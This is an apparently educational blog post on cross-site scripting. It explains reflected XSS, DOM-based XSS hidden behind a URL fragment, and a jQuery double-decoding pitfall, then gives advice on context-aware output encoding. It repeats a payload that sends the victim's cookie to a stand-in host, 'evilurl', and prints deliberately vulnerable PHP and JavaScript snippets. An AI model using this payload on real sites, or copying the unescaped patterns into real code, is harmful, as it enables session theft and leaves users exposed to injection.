Cross Site Scripting (or XSS for short) has been a known nasty in the arsenal of web attackers for quite a while now.
The basic principle for XSS is simple: if user supplied input is somehow reflected inside a web page without proper precautions (filtering / encoding / etc.), then it may be possible for this input to mess with the structure of the HTML document, which may in turn mean that it can be used to add malicious tags or attributes (usually resulting in javascript execution).
To illustrate this with a simple example, consider the following simple dynamic HelloWorld.php script:
<html>
<body>
<p>Hello <?php echo($_GET['who']); ?>!</p>
</body>
</html>
If we run this script from the url "http://url/HelloWorld.php?who=world", then we are greeted with a page containing the line:
"<p>Hello world!</p>"
However, if we wanted to, we could use the url to do something more evil.
Suppose we were to let an innocent victim click on the following link:
http://url/HelloWorld.php?who=<script>document.location='http://evilurl/EvilDriveByDownloadAndCookieStealer.php?cookie='%2bdocument.cookie;</script>
Then our victim would be presented with a piece of html containing the line:
<p>Hello <script>document.location='http://evilurl/EvilDriveByDownloadAndCookieStealer.php?cookie='+document.cookie;</script>!</p>
Which would redirect our victim to an evil drive-by download page and give the attacker access to the victim's (confidential) cookie of the original site. We could even decide to be even more evil and construct an entire javascript application that turns the victim's browser into a botnet zombie.
Now, as I said, this kind of problem has been known, used, abused and defended against for quite some time. Traditionally, the way to deal with this situation was to use some sort of magic server side function that either stripped user input of any characters that could mess with the layout or re-encoded the dangerous characters in such a way that they become harmless in the context of html. In fact, the latter option is usually preferred over the former, as removal of characters invariably leads to loss of information, which in many situations can be considered a Bad Thing.
So, to return to our HelloWorld.php example, the traditional way of fixing it would be something along the lines of
[..]
<p>Hello <?php echo(htmlentities($_GET['who'])); ?>!</p>
[..]
where the function htmlentities() does our magic encoding.
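To make the "magic" a little less magical, here is a minimal javascript sketch of what such an encoding step does. The helper name escapeHtml is my own invention for illustration and it is not a reimplementation of htmlentities(); it only covers the five characters that can change the structure of an HTML document.

```javascript
// Hypothetical helper (not a PHP or browser built-in): replaces the five
// characters that can alter HTML structure with their entity equivalents.
function escapeHtml(input) {
  const entities = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  };
  return String(input).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// The injected tag ends up as harmless text instead of markup.
const who = "<script>alert('XSS')</script>";
const line = '<p>Hello ' + escapeHtml(who) + '!</p>';
console.log(line);
// <p>Hello &lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;!</p>
```

Because the angle brackets are now entities, the browser displays the text of the script tag rather than executing it.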
Now this kind of approach was fine and dandy for a long time, when most if not all dynamic aspects of a page were determined server side. However, this is no longer the case. Although server side scripts still account for a fair amount of dynamism, client side scripting has been slowly but steadily gaining popularity as the new source of Web Application Magic. This can be seen in the popularity and prevalence of javascript frameworks like jQuery, MooTools, Dojo, etc.
Of course, when a client side script starts messing with the contents / layout of a web page, it runs the risk of doing so in a way that leads to unintended results, such as the accidental addition of html tags or attributes that may once more lead to javascript execution.
For instance, we could implement the HelloWorld page using nothing but html and javascript and once more do so in a dangerous way.
[...]
<p>Hello
<script>
var index = document.location.href.indexOf("?who=")+5;
var who = decodeURIComponent(document.location.href.substring(index));
document.write(who)
</script>
!</p>
[...]
Once more, we can use this page to inject a redirection to our evil page:
http://url/HelloWorld.html?who=<script>document.location='http://evilurl/EvilDriveByDownloadAndCookieStealer.php?cookie='%2bdocument.cookie;</script>
What is more, we can now use some trickery to avoid exposing our injection to the webserver. Suppose we were to have our victim click the following link:
http://url/HelloWorld.html?who=world#<script>document.location='http://evilurl/EvilDriveByDownloadAndCookieStealer.php?cookie='%2bdocument.cookie;</script>
Notice the added hashmark "#". In a URI, this symbol basically means that what follows is a piece of information that the browser can use to find a specific part in the webpage. As it is only relevant to the browser, browsers generally do not send the hashmark and anything after it to the webserver. So, if our victim were to click the link, the webserver would only see that somebody requested "http://url/HelloWorld.html?who=world", which it assumes is perfectly normal. The HTML, however, after evaluating the javascript, would include a line
<p>Hello world#<script>document.location='http://evilurl/EvilDriveByDownloadAndCookieStealer.php?cookie='+document.cookie;</script>!</p>
Which still redirects our victim to our evil page.
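The split between what the webserver sees and what the script sees can be sketched with the standard URL class. The host "url" is the same placeholder used in the links above and the payload is shortened to a harmless alert; the variable names are mine.

```javascript
// Illustrative link with a payload hidden behind the hashmark.
const link = new URL('http://url/HelloWorld.html?who=world#<script>alert(1)</script>');

// What ends up in the HTTP request: path plus query string, no fragment.
const sentToServer = link.pathname + link.search;

// What client side script can still read from the address bar afterwards.
// The URL parser percent-encodes the angle brackets, so we decode them again,
// just like the vulnerable page does with decodeURIComponent().
const fragment = decodeURIComponent(link.hash);

console.log(sentToServer); // /HelloWorld.html?who=world
console.log(fragment);     // #<script>alert(1)</script>
```

Anything that inspects only the request on the server side (logs, filters, a WAF) never gets a chance to look at the second value.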
As these kinds of client side generated XSS attacks are the result of manipulating the DOM (http://en.wikipedia.org/wiki/Document_Object_Model), they are called DOM based XSS attacks.
The way to prevent these kinds of attacks is once more a matter of properly encoding your output when working on untrusted inputs. Magic functions that will do this encoding for you exist for javascript just like they do for other languages (albeit in frameworks and not as default functions).
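As a rough sketch of what that looks like for the HelloWorld page, the snippet below builds the greeting as a string so it can be tried outside a browser. Both encodeForHtml and greetingHtml are hypothetical names of my own, not functions from jQuery or any other framework.

```javascript
// Hypothetical helper: HTML-encode a value that will be placed between tags.
function encodeForHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Builds the greeting from a full URL instead of writing raw input to the page.
function greetingHtml(href) {
  const url = new URL(href);
  // searchParams.get() returns the decoded parameter and ignores the fragment.
  const who = url.searchParams.get('who') || '';
  return '<p>Hello ' + encodeForHtml(who) + '!</p>';
}

console.log(greetingHtml('http://url/HelloWorld.html?who=<script>alert(1)</script>'));
// <p>Hello &lt;script&gt;alert(1)&lt;/script&gt;!</p>
```

In an actual page the same effect is usually easier to get by assigning the value to an element's textContent, which treats it as text rather than markup.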
An interesting question arises once a page uses both server side and client side scripting to construct a page. If user input has been encoded by the server side scripts, should the client side scripts still treat them as untrusted? Some people would instinctively say "yes", because you are still dealing with user supplied input and user supplied input by definition cannot be trusted. Others would instinctively say "no", because double encoding tends to lead to messy and unpredictable outputs. My answer is a resounding "it depends", and I will show you why.
Recently, I came across a web page that adopted the latter approach. The page used a post parameter to do some server side application magic and then reflected said parameter again as the value of a hidden input. The reflected parameter had all of its interesting characters properly encoded into their respective html entities so if I were to make a post with 'param=<script>alert("XSS")</script>', I would be presented with a piece of html like:
<input type="hidden" id="param" value="&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;"/>
So, I had no way of breaking out of the value attribute, let alone the input tag.
Curiously though, if I made the post using a browser and allowed all of the page's javascript to run, I was still presented with my XSS popup.

Going through the javascript, I found there was a little bit of jQuery that basically read
$('#someDiv').html('[some html]' + $('#param').val() + '[some other html]');
For those unfamiliar with jQuery, what this does is take the value attribute of our "param" input and put it together with some other html as the innerHTML of div "someDiv".
So, after this bit of javascript is evaluated, our HTML suddenly contains a line
<div id="someDiv">[some html]<script>alert("XSS")</script>[some other html]</div>
But wait! Wasn't our "param" encoded with HTML entities and stuff? Shouldn't that line have read
<div id="someDiv">[some html]&lt;script&gt;alert("XSS")&lt;/script&gt;[some other html]</div>
and been safe to display?
Well, yes and no. Yes, the value of "param" was indeed properly encoded. However, the browser decodes this encoding when it parses the value attribute, so the string that val() returns contains the value as it was interpreted, not as it was encoded: "<script>alert("XSS")</script>".
This kind of interpreting is done all the time by your browser, although not always as you would expect. How content of an attribute or a tag is interpreted and/or re-encoded depends on a combination of which accessor is used to retrieve the content and the tag/attribute that contains it. The id attribute is interpreted differently from an anchor's href, for instance. And the way content of tags is interpreted changes depending on whether you use innerHTML or textContent.
I highly recommend playing around a bit with various combinations of accessors, nestings and encodings.
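The round trip can be imitated outside a browser. The decodeEntities function below is a deliberately simplified stand-in of my own for the browser's attribute parsing (it knows only five entities), so treat it as an illustration of the effect rather than of how a browser actually implements it.

```javascript
// Simplified stand-in for the browser's attribute parsing: decodes five
// entities in a single pass, so "&amp;lt;" becomes "&lt;" and not "<".
function decodeEntities(text) {
  const chars = { lt: '<', gt: '>', quot: '"', amp: '&', '#39': "'" };
  return text.replace(/&(lt|gt|quot|amp|#39);/g, (match, name) => chars[name]);
}

// The attribute value as it appears in the page source sent by the server.
const encodedOnTheWire = '&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;';

// Roughly what $('#param').val() hands back to the script.
const valueSeenByScript = decodeEntities(encodedOnTheWire);

// Concatenating that string into markup reintroduces the tag.
const markup = '[some html]' + valueSeenByScript + '[some other html]';
console.log(markup);
// [some html]<script>alert("XSS")</script>[some other html]
```

The server side encoding did its job for the attribute context, but it was undone before the value reached the second, client side output context.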
To get you started I have included a little section that shows some of the ways in which the string "<<b>script>alert(1)<</b>/scr<br/>ipt>" can be interpreted.
<script>alert(1)</scr
ipt>
As you can see, these three accessors produce three completely different outputs, each of which contains at least one set of valid html tags (and therefore a possible source of XSS).
Because the way that data is interpreted by the browser is so heavily influenced by its context, it is nigh impossible to create a magic catch-all server side function that will turn untrusted user input into safe-for-javascript-manipulation sanitized data. This means that in order to create a safe web application, the client-side javascript needs to treat any input that can be influenced by the user as untrusted, even when it's already encoded server side. This means that before reflecting data on a web-page, you have to
1) determine the context in which the data is going to be reflected, so you can determine which character encodings are appropriate and which are dangerous
2) determine the behaviour of the accessors you are using, so you know what kind of automatic character encoding conversions are applied when retrieving and/or reflecting the data
3) decode and/or re-encode the input in such a way that after the automatic conversions, the reflected output conforms to the appropriate encoding.
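A rough sketch of these steps, under a few assumptions: the three context names and the reflect function are hypothetical, the accessor is assumed to have already decoded the value (step 2), and the attribute encoder is only meant for attribute values that are wrapped in quotes.

```javascript
// Step 1: one hypothetical encoder per output context.
const encoders = {
  // Text between tags: only the characters that can open a tag or entity.
  htmlText: (s) => s.replace(/[&<>]/g, (c) => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;' }[c])),
  // Quoted attribute values: also neutralise both kinds of quotes.
  htmlAttribute: (s) => s.replace(/[&<>"']/g, (c) => '&#' + c.charCodeAt(0) + ';'),
  // A single URL parameter value.
  urlComponent: (s) => encodeURIComponent(s),
};

// Step 3: re-encode an already decoded value for the context it is written to.
function reflect(value, context) {
  if (!Object.prototype.hasOwnProperty.call(encoders, context)) {
    // Refuse to guess: an unknown context is a bug, not a default.
    throw new Error('Unknown output context: ' + context);
  }
  return encoders[context](String(value));
}

console.log(reflect('<b>', 'htmlText'));                          // &lt;b&gt;
console.log(reflect('" onmouseover="alert(1)', 'htmlAttribute')); // &#34; onmouseover=&#34;alert(1)
console.log(reflect('a&b=c', 'urlComponent'));                    // a%26b%3Dc
```

The point of passing the context explicitly is that the same input needs a different encoding in each place it is reflected, which is exactly what a single catch-all function cannot know.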
Of course, this can be abstracted by creating / using custom accessors that automatically apply decoding mechanisms for data retrieval and encoding mechanisms for data reflection, but that's an exercise I'll leave to the reader ;)
Happy hacking!